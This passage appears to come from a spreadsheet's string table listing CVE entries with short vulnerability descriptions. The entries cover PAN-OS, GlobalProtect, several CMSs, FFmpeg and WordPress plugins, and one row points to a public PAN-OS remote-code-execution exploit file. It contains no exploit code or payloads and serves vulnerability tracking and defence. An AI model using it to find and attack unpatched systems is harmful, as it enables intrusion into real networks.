    <t>An integer underflow vulnerability in the dnsproxyd component of the PAN-OS management interface allows authenticated administrators to issue a command from the command line interface that causes the component to stop responding. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue impacts: PAN-OS 9.1 versions earlier than PAN-OS 9.1.3. This issue does not impact PAN-OS 8.1, PAN-OS 9.0, or Prisma Access services.</t>
  </si>
  <si>
    <t>CVE-2020-2032</t>
  </si>
  <si>
    <t>A race condition vulnerability Palo Alto Networks GlobalProtect app on Windows allows a local limited Windows user to execute programs with SYSTEM privileges. This issue can be exploited only while performing a GlobalProtect app upgrade. This issue affects: GlobalProtect app 5.0 versions earlier than GlobalProtect app 5.0.10 on Windows; GlobalProtect app 5.1 versions earlier than GlobalProtect app 5.1.4 on Windows.</t>
  </si>
  <si>
    <t>CVE-2020-2033</t>
  </si>
  <si>
    <t>When the pre-logon feature is enabled, a missing certification validation in Palo Alto Networks GlobalProtect app can disclose the pre-logon authentication cookie to a man-in-the-middle attacker on the same local area network segment with the ability to manipulate ARP or to conduct ARP spoofing attacks. This allows the attacker to access the GlobalProtect Server as allowed by configured Security rules for the 'pre-login' user. This access may be limited compared to the network access of regular users. This issue affects: GlobalProtect app 5.0 versions earlier than GlobalProtect app 5.0.10 when the prelogon feature is enabled; GlobalProtect app 5.1 versions earlier than GlobalProtect app 5.1.4 when the prelogon feature is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-2034</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network based attacker to execute arbitrary OS commands with root privileges. An attacker requires some knowledge of the firewall to exploit this issue. This issue can not be exploited if GlobalProtect portal feature is not enabled. This issue impacts PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; all versions of PAN-OS 8.0 and PAN-OS 7.1. Prisma Access services are not impacted by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-20340</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in the 4.edu.php\conn\function.php component of S-CMS v1.0 allows attackers to access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-20341</t>
  </si>
  <si>
    <t>YzmCMS v5.5 contains a server-side request forgery (SSRF) in the grab_image() function.</t>
  </si>
  <si>
    <t>CVE-2020-20343</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a cross-site request forgery (CSRF) vulnerability in the index.php?g=admin&amp;m=nav&amp;a=add_post component that allows attackers to arbitrarily add articles in the administrator background.</t>
  </si>
  <si>
    <t>CVE-2020-20344</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a reflective cross-site scripting (XSS) vulnerability in the keyword search function under the background articles module.</t>
  </si>
  <si>
    <t>CVE-2020-20345</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a reflective cross-site scripting (XSS) vulnerability in the page management background which allows attackers to obtain cookies via a crafted payload entered into the search box.</t>
  </si>
  <si>
    <t>CVE-2020-20347</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a stored cross-site scripting (XSS) vulnerability in the source field under the article management module.</t>
  </si>
  <si>
    <t>CVE-2020-20348</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a stored cross-site scripting (XSS) vulnerability in the link field under the background menu management module.</t>
  </si>
  <si>
    <t>CVE-2020-20349</t>
  </si>
  <si>
    <t>WTCMS 1.0 contains a stored cross-site scripting (XSS) vulnerability in the link address field under the background links module.</t>
  </si>
  <si>
    <t>CVE-2020-2035</t>
  </si>
  <si>
    <t>When SSL/TLS Forward Proxy Decryption mode has been configured to decrypt the web transactions, the PAN-OS URL filtering feature inspects the HTTP Host and URL path headers for policy enforcement on the decrypted HTTPS web transactions but does not consider Server Name Indication (SNI) field within the TLS Client Hello handshake. This allows a compromised host in a protected network to evade any security policy that uses URL filtering on a firewall configured with SSL Decryption in the Forward Proxy mode. A malicious actor can then use this technique to evade detection of communication on the TLS handshake phase between a compromised host and a remote malicious server. This technique does not increase the risk of a host being compromised in the network. It does not impact the confidentiality or availability of a firewall. This is considered to have a low impact on the integrity of the firewall because the firewall fails to enforce a policy on certain traffic that should have been blocked. This issue does not impact the URL filtering policy enforcement on clear text or encrypted web transactions. This technique can be used only after a malicious actor has compromised a host in the protected network and the TLS/SSL Decryption feature is enabled for the traffic that the attacker controls. Palo Alto Networks is not aware of any malware that uses this technique to exfiltrate data. This issue is applicable to all current versions of PAN-OS. This issue does not impact Panorama or WF-500 appliances.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-2036</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.</t>
  </si>
  <si>
    <t>CVE-2020-20363</t>
  </si>
  <si>
    <t>Crossi Site Scripting (XSS) vulnerability in PbootCMS 2.0.3 in admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-2037</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.3.</t>
  </si>
  <si>
    <t>CVE-2020-2038</t>
  </si>
  <si>
    <t>An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/51005.py</t>
  </si>
  <si>
    <t>PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)</t>
  </si>
  <si>
    <t>2022-08-09</t>
  </si>
  <si>
    <t>CVE-2020-20389</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in GetSimpleCMS 3.4.0a in admin/edit.php.</t>
  </si>
  <si>
    <t>CVE-2020-2039</t>
  </si>
  <si>
    <t>An uncontrolled resource consumption vulnerability in Palo Alto Networks PAN-OS allows for a remote unauthenticated user to upload temporary files through the management web interface that are not properly deleted after the request is finished. It is possible for an attacker to disrupt the availability of the management web interface by repeatedly uploading files until available disk space is exhausted. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.4; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-20391</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in GetSimpleCMS 3.4.0a in admin/snippets.php via (1) Add Snippet and (2) Save snippets.</t>
  </si>
  <si>
    <t>CVE-2020-20392</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in imcat v5.2 via the fm[auser] parameters in coms/add_coms.php.</t>
  </si>
  <si>
    <t>CVE-2020-2040</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in PAN-OS allows an unauthenticated attacker to disrupt system processes and potentially execute arbitrary code with root privileges by sending a malicious request to the Captive Portal or Multi-Factor Authentication interface. This issue impacts: All versions of PAN-OS 8.0; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 9.1 versions earlier than PAN-OS 9.1.3.</t>
  </si>
  <si>
    <t>CVE-2020-20406</t>
  </si>
  <si>
    <t>A stored XSS vulnerability exists in the Custom Link Attributes control Affect function in Elementor Page Builder 2.9.2 and earlier versions. It is caused by inadequate filtering on the link custom attributes.</t>
  </si>
  <si>
    <t>CVE-2020-2041</t>
  </si>
  <si>
    <t>An insecure configuration of the appweb daemon of Palo Alto Networks PAN-OS 8.1 allows a remote unauthenticated user to send a specifically crafted request to the device that causes the appweb service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue impacts all versions of PAN-OS 8.0, and PAN-OS 8.1 versions earlier than 8.1.16.</t>
  </si>
  <si>
    <t>CVE-2020-20412</t>
  </si>
  <si>
    <t>lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file.</t>
  </si>
  <si>
    <t>CVE-2020-2042</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the PAN-OS management web interface allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges. This issue impacts only PAN-OS 10.0 versions earlier than PAN-OS 10.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-20425</t>
  </si>
  <si>
    <t>S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in the search function.</t>
  </si>
  <si>
    <t>CVE-2020-20426</t>
  </si>
  <si>
    <t>S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in /function/booksave.php.</t>
  </si>
  <si>
    <t>CVE-2020-2043</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability where sensitive fields are recorded in the configuration log without masking on Palo Alto Networks PAN-OS software when the after-change-detail custom syslog field is enabled for configuration logs and the sensitive field appears multiple times in one log entry. The first instance of the sensitive field is masked but subsequent instances are left in clear text. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.4.</t>
  </si>
  <si>
    <t>CVE-2020-2044</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability where an administrator's password or other sensitive information may be logged in cleartext while using the CLI in Palo Alto Networks PAN-OS software. The opcmdhistory.log file was introduced to track operational command (op-command) usage but did not mask all sensitive information. The opcmdhistory.log file is removed in PAN-OS 9.1 and later PAN-OS versions. Command usage is recorded, instead, in the req_stats.log file in PAN-OS 9.1 and later PAN-OS versions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.3.</t>
  </si>
  <si>
    <t>CVE-2020-20444</t>
  </si>
  <si>
    <t>Jact OpenClinic 0.8.20160412 allows the attacker to read server files after login to the the admin account by an infected 'file' GET parameter in '/shared/view_source.php' which "could" lead to RCE vulnerability .</t>
  </si>
  <si>
    <t>CVE-2020-20445</t>
  </si>
  <si>
    <t>FFmpeg 4.2 is affected by a Divide By Zero issue via libavcodec/lpc.h, which allows a remote malicious user to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-20446</t>
  </si>
  <si>
    <t>FFmpeg 4.2 is affected by a Divide By Zero issue via libavcodec/aacpsy.c, which allows a remote malicious user to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-20448</t>
  </si>
  <si>
    <t>FFmpeg 4.1.3 is affected by a Divide By Zero issue via libavcodec/ratecontrol.c, which allows a remote malicious user to cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-20450</t>
  </si>
  <si>
    <t>FFmpeg 4.2 is affected by null pointer dereference passed as argument to libavformat/aviobuf.c, which could cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-20451</t>
  </si>
  <si>
    <t>Denial of Service issue in FFmpeg 4.2 due to resource management errors via fftools/cmdutils.c.</t>
  </si>
  <si>
    <t>CVE-2020-20453</t>
  </si>
  <si>
    <t>FFmpeg 4.2 is affected by a Divide By Zero issue via libavcodec/aaccoder, which allows a remote malicious user to cause a Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-20466</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 is vulnerable to unauthorized access via user_edit_password.php, remote attackers can modify the password of any user.</t>
  </si>
  <si>
    <t>CVE-2020-20467</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 is vulnerable to sensitive information disclosure via default_task_add.php, remote attackers can exploit the vulnerability to create a task.</t>
  </si>
  <si>
    <t>CVE-2020-20468</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 is vulnerable to CSRF. Attackers can use the user_edit_password.php file to modify the user password.</t>
  </si>
  <si>
    <t>CVE-2020-20469</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the log_edit.php files failing to filter the csa_to_user parameter, remote attackers can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-20470</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has web site physical path leakage vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-20471</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has an unauthorized access vulnerability in default_user_edit.php, remote attackers can exploit this vulnerability to escalate to admin privileges.</t>
  </si>
  <si>
    <t>CVE-2020-20472</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has a sensitive information disclosure vulnerability. The if_get_addbook.php file does not have an authentication operation. Remote attackers can obtain username information for all users of the current site.</t>
  </si>
  <si>
    <t>CVE-2020-20473</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the control_task.php, control_project.php, default_user.php files failing to filter the sort parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-20474</t>
  </si>
  <si>
    <t>White Shark System (WSS) 1.3.2 has a SQL injection vulnerability. The vulnerability stems from the default_task_edituser.php files failing to filter the csa_to_user parameter. Remote attackers can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-2048</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists where the password for the configured system proxy server for a PAN-OS appliance may be displayed in cleartext when using the CLI in Palo Alto Networks PAN-OS software. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-20486</t>
  </si>
  <si>
    <t>IEC104 v1.0 contains a stack-buffer overflow in the parameter Iec10x_Sta_Addr.</t>
  </si>
  <si>
    <t>CVE-2020-2049</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability exists in Palo Alto Networks Cortex XDR Agent on the Windows platform that allows an authenticated local Windows user to execute programs with SYSTEM privileges. This requires the user to have the privilege to create files in the Windows root directory. This issue impacts: All versions of Cortex XDR Agent 7.1 with content update 149 and earlier versions; All versions of Cortex XDR Agent 7.2 with content update 149 and earlier versions.</t>
  </si>
  <si>
    <t>CVE-2020-20490</t>
  </si>
  <si>
    <t>A heap buffer-overflow in the client_example1.c component of libiec_iccp_mod v1.5 leads to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-20495</t>
  </si>
  <si>
    <t>bludit v3.13.0 contains an arbitrary file deletion vulnerability in the backup plugin via the `deleteBackup' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2050</t>
  </si>
  <si>
    <t>An authentication bypass vulnerability exists in the GlobalProtect SSL VPN component of Palo Alto Networks PAN-OS software that allows an attacker to bypass all client certificate checks with an invalid certificate. A remote attacker can successfully authenticate as any user and gain access to restricted VPN network resources when the gateway or portal is configured to rely entirely on certificate-based authentication. Impacted features that use SSL VPN with client certificate verification are: GlobalProtect Gateway, GlobalProtect Portal, GlobalProtect Clientless VPN In configurations where client certificate verification is used in conjunction with other authentication methods, the protections added by the certificate check are ignored as a result of this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.17; PAN-OS 9.0 versions earlier than PAN-OS 9.0.11; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-20508</t>
  </si>
  <si>
    <t>Shopkit v2.7 contains a reflective cross-site scripting (XSS) vulnerability in the /account/register component, which allows attackers to hijack user credentials via a crafted payload in the E-Mail text field.</t>
  </si>
  <si>
    <t>CVE-2020-20514</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in Maccms v10 via admin.php/admin/admin/del/ids/&lt;id&gt;.html allows authenticated attackers to delete all users.</t>
  </si>
  <si>
    <t>CVE-2020-20545</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in Zhiyuan G6 Government Collaboration System V6.1SP1, via the 'method' parameter to 'seeyon/hrSalary.do'.</t>
  </si>
  <si>
    <t>CVE-2020-20582</t>
  </si>
  <si>
    <t>A server side request forgery (SSRF) vulnerability in /ApiAdminDomainSettings.php of MipCMS 5.0.1 allows attackers to access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-20583</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in /question.php of LJCMS Version v4.3.R60321 allows attackers to obtain sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-20584</t>
  </si>
  <si>
    <t>A cross site scripting vulnerability in baigo CMS v4.0-beta-1 allows attackers to execute arbitrary web scripts or HTML via the form parameter post to /public/console/profile/info-submit/.</t>
  </si>
  <si>
    <t>CVE-2020-20585</t>
  </si>
  <si>
    <t>A blind SQL injection in /admin/?n=logs&amp;c=index&amp;a=dode of Metinfo 7.0 beta allows attackers to access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-20586</t>
  </si>
  <si>
    <t>A cross site request forgery (CSRF) vulnerability in the /xyhai.php?s=/Auth/editUser URI of XYHCMS V3.6 allows attackers to edit any information of the administrator such as the name, e-mail, and password.</t>
  </si>
  <si>
    <t>CVE-2020-20593</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in Rockoa v1.9.8 allows an authenticated attacker to arbitrarily add an administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-20595</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in OPMS v1.3 and below allows attackers to arbitrarily add a user account via /user/add.</t>
  </si>
  <si>
    <t>CVE-2020-20597</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the potrtalItemName parameter in \web\PortalController.java of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-20598</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the Editing component of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-20600</t>
  </si>
  <si>
    <t>MetInfo 7.0 beta contains a stored cross-site scripting (XSS) vulnerability in the $name parameter of admin/?n=column&amp;c=index&amp;a=doAddColumn.</t>
  </si>
  <si>
    <t>CVE-2020-20601</t>
  </si>
  <si>
    <t>An issue in ThinkCMF X2.2.2 and below allows attackers to execute arbitrary code via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-20605</t>
  </si>
  <si>
    <t>Blog CMS v1.0 contains a cross-site scripting (XSS) vulnerability in the /controller/CommentAdminController.java component.</t>
  </si>
  <si>
    <t>CVE-2020-20625</t>
  </si>
  <si>
    <t>Sliced Invoices plugin for WordPress 3.8.2 and earlier allows unauthenticated information disclosure and authenticated SQL injection via core/class-sliced.php.</t>
  </si>
  <si>
    <t>CVE-2020-20626</t>
  </si>
  <si>
    <t>lara-google-analytics.php in Lara Google Analytics plugin through 2.0.4 for WordPress allows authenticated stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-20627</t>
  </si>
  <si>
    <t>The includes/gateways/stripe/includes/admin/admin-actions.php in GiveWP plugin through 2.5.9 for WordPress allows unauthenticated settings change.</t>
  </si>
  <si>
    <t>CVE-2020-20628</t>
  </si>
  <si>
    <t>controller/controller-comments.php in WP GDPR plugin through 2.1.1 has unauthenticated stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-20633</t>
  </si>
  <si>
    <t>ajax_policy_generator in admin/modules/cli-policy-generator/classes/class-policy-generator-ajax.php in GDPR Cookie Consent (cookie-law-info) 1.8.2 and below plugin for WordPress, allows authenticated stored XSS and privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-20634</t>
  </si>
  <si>
    <t>Elementor 2.9.5 and below WordPress plugin allows authenticated users to activate its safe mode feature. This can be exploited to disable all security plugins on the blog.</t>
  </si>
  <si>
    <t>CVE-2020-20640</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in ECShop 4.0 due to security filtering issues, in the user.php file, we can use the html entity encoding to bypass the security policy of the safety.php file, triggering the xss vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-20642</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in EyouCMS 1.3.6 that can add an htm page to execute the js code via login.php?m=admin&amp;c=Filemanager&amp;a=newfile&amp;lang=cn.</t>
  </si>
  <si>
    <t>CVE-2020-20645</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in EyouCMS1.3.6 in the basic_information area.</t>
  </si>
  <si>
    <t>CVE-2020-20657</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denial of service via an unexpected packet while trying to connect.</t>
  </si>
  <si>
    <t>CVE-2020-20658</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in fcovatti libiec_iccp_mod v1.5, allows attackers to cause a denail of service when trying to calloc an unexpectiedly large space.</t>
  </si>
  <si>
    <t>CVE-2020-20662</t>
  </si>
  <si>
    <t>libiec_iccp_mod v1.5 contains a heap-buffer-overflow in the component mms_client_example1.c.</t>
  </si>
  <si>
    <t>CVE-2020-20663</t>
  </si>
  <si>
    <t>libiec_iccp_mod v1.5 contains a heap-buffer-overflow in the component mms_client_connection.c.</t>
  </si>
  <si>
    <t>CVE-2020-20664</t>
  </si>
  <si>
    <t>libiec_iccp_mod v1.5 contains a segmentation violation in the component server_example1.c.</t>
  </si>
  <si>
    <t>CVE-2020-20665</t>
  </si>
  <si>
    <t>rudp v0.6 was discovered to contain a memory leak in the component main.c.</t>
  </si>
  <si>
    <t>CVE-2020-20670</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in /admin/media/upload of ZKEACMS V3.2.0 allows attackers to execute arbitrary code via a crafted HTML file.</t>
  </si>
  <si>
    <t>CVE-2020-20671</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in KiteCMS V1.1 allows attackers to arbitrarily add an administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-20672</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in /admin/upload/uploadfile of KiteCMS V1.1 allows attackers to getshell via a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-20675</t>
  </si>
  <si>
    <t>Nuishop v2.3 contains a SQL injection vulnerability in /goods/getGoodsListByConditions/.</t>
  </si>
  <si>
    <t>CVE-2020-20691</t>
  </si>
  <si>
    <t>An issue in Monstra CMS v3.0.4 allows attackers to execute arbitrary web scripts or HTML via bypassing the file extension filter and uploading crafted HTML files.</t>
  </si>
  <si>
    <t>CVE-2020-20692</t>
  </si>
  <si>
    <t>GilaCMS v1.11.4 was discovered to contain a SQL injection vulnerability via the $_GET parameter in /src/core/controllers/cm.php.</t>
  </si>
  <si>
    <t>CVE-2020-20693</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in GilaCMS v1.11.4 allows authenticated attackers to arbitrarily add administrator accounts.</t>
  </si>
  <si>
    <t>CVE-2020-20695</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.</t>
  </si>
  <si>
    <t>CVE-2020-20696</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in /admin/content/post of GilaCMS v1.11.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Tags field.</t>
  </si>
  <si>
    <t>CVE-2020-20698</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in /1.com.php of S-CMS PHP v3.0 allows attackers to getshell via modification of a PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-20699</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in S-CMS PHP v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Copyright text box under Basic Settings.</t>
  </si>
  <si>
    <t>CVE-2020-20700</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /app/form_add/of S-CMS PHP v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Title Entry text box.</t>
  </si>
  <si>
    <t>CVE-2020-20701</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /app/config/of S-CMS PHP v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-20739</t>
  </si>
  <si>
    <t>im_vips2dz in /libvips/libvips/deprecated/im_vips2dz.c in libvips before 8.8.2 has an uninitialized variable which may cause the leakage of remote server path or stack address.</t>
  </si>
  <si>
    <t>CVE-2020-20740</t>
  </si>
  <si>
    <t>PDFResurrect before 0.20 lack of header validation checks causes heap-buffer-overflow in pdf_get_version().</t>
  </si>
  <si>
    <t>CVE-2020-20741</t>
  </si>
  <si>
    <t>Incorrect Access Control in Beckhoff Automation GmbH &amp; Co. KG CX9020 with firmware version CX9020_CB3011_WEC7_HPS_v602_TC31_B4016.6 allows remote attackers to bypass authentication via the "CE Remote Display Tool" as it does not close the incoming connection on the Windows CE side if the credentials are incorrect.</t>
  </si>
  <si>
    <t>CVE-2020-20746</t>
  </si>
  <si>
    <t>A stack-based buffer overflow in the httpd server on Tenda AC9 V15.03.06.60_EN allows remote attackers to execute arbitrary code or cause a denial of service (DoS) via a crafted POST request to /goform/SetStaticRouteCfg.</t>
  </si>
  <si>
    <t>CVE-2020-2075</t>
  </si>
  <si>
    <t>Platform mechanism AutoIP allows remote attackers to reboot the device via a crafted packet in SICK AG solutions Bulkscan LMS111, Bulkscan LMS511, CLV62x – CLV65x, ICR890-3, LMS10x, LMS11x, LMS15x, LMS12x, LMS13x, LMS14x, LMS5xx, LMS53x, MSC800, RFH.</t>
  </si>
  <si>
    <t>CVE-2020-2076</t>
  </si>
  <si>
    <t>SICK Package Analytics software up to and including version V04.0.0 are vulnerable to an authentication bypass by directly interfacing with the REST API. An attacker can send unauthorized requests, bypass current authentication controls presented by the application and could potentially write files without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-2077</t>
  </si>
  <si>
    <t>SICK Package Analytics software up to and including version V04.0.0 are vulnerable due to incorrect default permissions settings. An unauthorized attacker could read sensitive data from the system by querying for known files using the REST API directly.</t>
  </si>
  <si>
    <t>CVE-2020-2078</t>
  </si>
  <si>
    <t>Passwords are stored in plain text within the configuration of SICK Package Analytics software up to and including V04.1.1. An authorized attacker could access these stored plaintext credentials and gain access to the ftp service. Storing a password in plaintext allows attackers to easily gain access to systems, potentially compromising personal information or other sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-20781</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in /ucms/index.php?do=list_edit of UCMS 1.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the title, key words, description or content text fields.</t>
  </si>
  <si>
    <t>CVE-2020-20796</t>
  </si>
  <si>
    <t>FlameCMS 3.3.5 contains a SQL injection vulnerability in /master/article.php via the "Id" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-20797</t>
  </si>
  <si>
    <t>FlameCMS 3.3.5 contains a time-based blind SQL injection vulnerability in /account/register.php.</t>
  </si>
  <si>
    <t>CVE-2020-20799</t>
  </si>
  <si>
    <t>JeeCMS 1.0.1 contains a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the commentText parameter.</t>
  </si>
  <si>
    <t>CVE-2020-20800</t>
  </si>
  <si>
    <t>An issue was discovered in MetInfo v7.0.0 beta. There is SQL Injection via the install/index.php?action=adminsetup&amp;cndata=yes&amp;endata=yes&amp;showdata=yes URI.</t>
  </si>
  <si>
    <t>CVE-2020-20891</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in function config_input in libavfilter/vf_gblur.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2020-20892</t>
  </si>
  <si>
    <t>An issue was discovered in function filter_frame in libavfilter/vf_lenscorrection.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts due to a division by zero.</t>
  </si>
  <si>
    <t>CVE-2020-20896</t>
  </si>
  <si>
    <t>An issue was discovered in function latm_write_packet in libavformat/latmenc.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts due to a Null pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-20898</t>
  </si>
  <si>
    <t>Integer Overflow vulnerability in function filter16_prewitt in libavfilter/vf_convolution.c in Ffmpeg 4.2.1, allows attackers to cause a Denial of Service or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2020-2090</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Amazon EC2 Plugin 1.47 and earlier allows attackers to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.</t>
  </si>
  <si>
    <t>CVE-2020-20902</t>
  </si>
  <si>
